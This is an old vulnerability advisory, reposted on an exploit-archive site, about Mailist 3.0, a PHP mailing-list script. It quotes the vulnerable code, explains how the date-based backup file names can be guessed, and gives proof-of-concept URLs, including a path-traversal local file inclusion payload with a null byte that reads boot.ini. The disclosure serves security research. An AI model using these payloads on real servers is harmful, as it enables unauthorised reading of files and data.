Mailist 3.0 Insecure Backup/Local File Inclusion Vulnerabilities

2009.02.17
Credit: SirGod
Risk: Low
Local: No
Remote: Yes
CWE: CWE-22

############################################################################################# [+] Mailist 3.0 Insecure Backup/Local File Inclusion [+] Discovered By SirGod [+] www.mortal-team.org [+] www.h4cky0u.org [+] www.hellzone.info [+] www.anti-intruders.org ############################################################################################# [+] Homepage : http://ninjadesigns.co.uk/ [+] Download : http://ninjadesigns.co.uk/enter/mailist.zip [+] Insecure Backup - Vulnerable code in admin.php --------------------------------------------------------------------- if (isset($_GET['backup'])){ echo "<br>"; $file = 'maillist.php'; $newfile = 'backups/'.date("jnY").'.txt'; copy($file, $newfile); echo 'Successfully backed up. (backups/'.$newfile.')<br>'; echo '<a href="'.$_SERVER['PHP_SELF'].'">Hide</a><br>'; } ---------------------------------------------------------------------- We can see how its crated a backup : $newfile = 'backups/'.date("jnY").'.txt'; The date() function is used. n - Numeric representation of a month, without leading zeros j - Day of the month without leading zeros Y - A full numeric representation of a year, 4 digits So we can guess the database backup if we know when was created. Example : 622009.txt 6 - the day without leading 0 2 - the month without leading 0 2009 - the year PoC : http://127.0.0.1/path/backups/622009.txt [+] Local File Inclusion - Vulnerable code in send.php : --------------------------------------------------------------------- if(isset($load)){ include("outbox/".$load.".txt"); } --------------------------------------------------------------------- Example : http://127.0.0.1/path/send.php?load=[Local File]%00 PoC : http://127.0.0.1/path/send.php?load=../../../../boot.ini%00 #############################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top